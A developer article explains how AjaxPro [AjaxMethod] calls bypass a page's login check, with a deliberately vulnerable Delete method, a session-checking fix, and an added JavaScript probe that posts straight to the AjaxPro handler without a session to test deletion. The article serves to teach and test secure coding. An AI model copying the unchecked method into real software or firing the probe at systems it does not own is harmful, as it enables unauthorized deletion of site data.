AjaxPro no-refresh pages: an easily overlooked vulnerability when writing code

Lionsure 2020-08-23 Original by the website

Using AjaxPro to add no-refresh functionality to a web page is very convenient and saves a lot of JavaScript, but it is easy to overlook a vulnerability while writing the code. For example, some operations must only be available after logging in, yet the method exposed through AjaxPro never checks whether the user is logged in. This usually happens when a page in a management system inherits a base class that requires login, or the user has already been authenticated, and the AjaxPro method is written in that page's code-behind on the assumption that the login check has already been done and does not need to be repeated. That assumption is wrong. The login check in the page's code-behind only covers the page lifecycle; it does not cover the AjaxPro method, because an AjaxPro call is routed to AjaxPro's own handler, which invokes the method directly instead of loading the page. In other words, a user who has not logged in can still call the code-behind's AjaxPro method from JavaScript in the foreground (an aspx or htm page, or any script that sends the same request). This is very dangerous: if the AjaxPro method in the code-behind performs a delete, anyone can delete website data without logging in. Is the website still safe?
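To make the routing concrete, here is an added example (mine, not code from the original article or from AjaxPro) of what the client proxy call testpro.AjaxProDel.Delete(id) actually sends on the wire, written as plain JavaScript that runs in a browser console or in Node 18+. The handler path (ajaxpro/<type>,<assembly>.ashx), the X-AjaxPro-Method header and the {"value":...} / {"error":...} response shapes are taken from my reading of AjaxPro.NET's core.js and are assumptions to check against the core.js your version ships; the base URL, the probe record id, and the assembly name testpro are also assumptions.

```javascript
// Added example, not from the original article. Wire-format details below
// (handler path, header name, JSON shapes) are my reading of AjaxPro.NET's
// core.js; verify them against the core.js shipped with your AjaxPro version.

// The proxy call testpro.AjaxProDel.Delete(5) becomes a plain POST to the
// AjaxPro handler, NOT to AjaxProDel.aspx. The handler locates the type from
// the URL and invokes the method by reflection, so the page's OnLoad (and the
// login check in it) never runs for this request.
function buildAjaxProRequest(baseUrl, typeFullName, assemblyName, method, args) {
  return {
    url: `${baseUrl.replace(/\/$/, "")}/ajaxpro/${typeFullName},${assemblyName}.ashx`,
    method: "POST",
    headers: {
      "X-AjaxPro-Method": method,                 // which [AjaxMethod] to invoke
      "Content-Type": "text/plain; charset=utf-8",
    },
    body: JSON.stringify(args),                   // parameters keyed by name, e.g. {"id":5}
  };
}

// AjaxPro answers with {"value":...} on success or {"error":{...}} when the
// method threw. This is the `.value` that a page's del() function reads.
function parseAjaxProResponse(text) {
  const res = JSON.parse(text);
  if (res.error) {
    return { ok: false, error: res.error.Message || String(res.error) };
  }
  return { ok: true, value: res.value };
}

// Classify the result of Delete(id) for a request sent WITHOUT a session cookie.
// Unchecked method: value === true, the record was deleted with no login.
// Method that checks Session["user"]: value === false, nothing deleted.
function classify(parsed) {
  if (!parsed.ok) return "error";   // e.g. the method threw inside the handler
  return parsed.value === true ? "VULNERABLE: executed without login" : "refused";
}

// Live probe: sends the request with no cookies at all (Node's fetch has no
// cookie jar; in a browser the call is made from a fresh, logged-out profile).
// Only run this against a test environment with a disposable record, because
// an unchecked target really deletes it. baseUrl and id are assumptions.
async function probeDeleteWithoutLogin(baseUrl, id) {
  const req = buildAjaxProRequest(baseUrl, "testpro.AjaxProDel", "testpro", "Delete", { id });
  const resp = await fetch(req.url, { method: req.method, headers: req.headers, body: req.body });
  return classify(parseAjaxProResponse(await resp.text()));
}

// Usage (test environment only):
//   probeDeleteWithoutLogin("https://app.example.test", 123).then(console.log);
```

Note that a probe with an id of 0 or less cannot tell the two versions apart, since both return false before reaching the delete; the probe needs a real, disposable record id.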

 

Examples of the easily overlooked vulnerability in no-refresh AjaxPro code (code vulnerability examples)

1. The base class that checks whether the user is logged in

All pages that require login inherit this base class. If the user is logged in, the requested page is served; if not, the user is redirected to the login page. The code is as follows:

using System;
using System.Web;

// Base class for pages that require login. The check runs in OnLoad,
// that is, only when the page itself is requested and goes through the page lifecycle
public class IsLogin : System.Web.UI.Page
{
    public IsLogin()
    {
    }

    protected override void OnLoad(EventArgs e)
    {
        if (HttpContext.Current.Session["user"] == null)
        {
            // The user is not logged in: redirect to the login page
            HttpContext.Current.Response.Redirect("Login page URL");
            return;
        }
        base.OnLoad(e);
    }
}

 

2. AjaxPro deletes a record without refreshing the page

To delete a record without refreshing, first reference AjaxPro in the code-behind and register the page type; the JavaScript in the foreground is as follows:

<script type="text/javascript" language="javascript">
    // testpro.AjaxProDel.Delete is the client proxy AjaxPro generates for the
    // [AjaxMethod] in the code-behind; the call goes to the AjaxPro handler
    function del(id) {
        var res = testpro.AjaxProDel.Delete(id).value;
        if (res) {
            alert("Successfully deleted");
        }
        else {
            alert("Failed to delete");
        }
    }
</script>

 

Code in the code-behind:

using System;
using AjaxPro;

namespace testpro
{
    // Inherits the base class that checks whether the user is logged in
    public partial class AjaxProDel : IsLogin
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            // Register the page type with AjaxPro so the client proxy is emitted
            Utility.RegisterTypeForAjax(typeof(AjaxProDel));
        }

        // Vulnerable as written: the method is reached through the AjaxPro handler,
        // where IsLogin.OnLoad never runs, and it does no login check of its own
        [AjaxMethod]
        public bool Delete(int id)
        {
            if (id <= 0) return false;

            // Write the code that deletes the record from the database here
            // and set deleted according to its result
            bool deleted = DeleteRecord(id);
            return deleted;
        }

        // Placeholder for the data-access code, which the article does not show
        private static bool DeleteRecord(int id)
        {
            throw new NotImplementedException("delete the record with id " + id);
        }
    }
}

The code above makes the mistake described at the beginning of the article. Although the code-behind inherits the "IsLogin" class, that check only runs in the page lifecycle; a user who has not logged in can still call Delete(int id) through the AjaxPro handler. The AjaxPro method must check the login state itself. The revised code is below; the HttpSessionStateRequirement.Read argument to AjaxMethod is what gives the method read access to the session (an AjaxPro method has no session access by default, so without it HttpContext.Current.Session is null inside the call):

// Read access to the session is required; otherwise HttpContext.Current.Session
// is null inside an AjaxPro call
[AjaxMethod(AjaxPro.HttpSessionStateRequirement.Read)]
public bool Delete(int id)
{
    if (HttpContext.Current.Session["user"] == null)
        return false; // The user is not logged in: return false without deleting

    if (id <= 0) return false;

    // Write the code that deletes the record from the database here
    // and set deleted according to its result
    bool deleted = DeleteRecord(id);
    return deleted;
}

There is still a vulnerability in the revised code. I don't know whether you have spotted it; I believe you will after some thought. If not, you will find it once you have written more code: as the saying goes, quantitative change accumulates to a certain point and qualitative change occurs.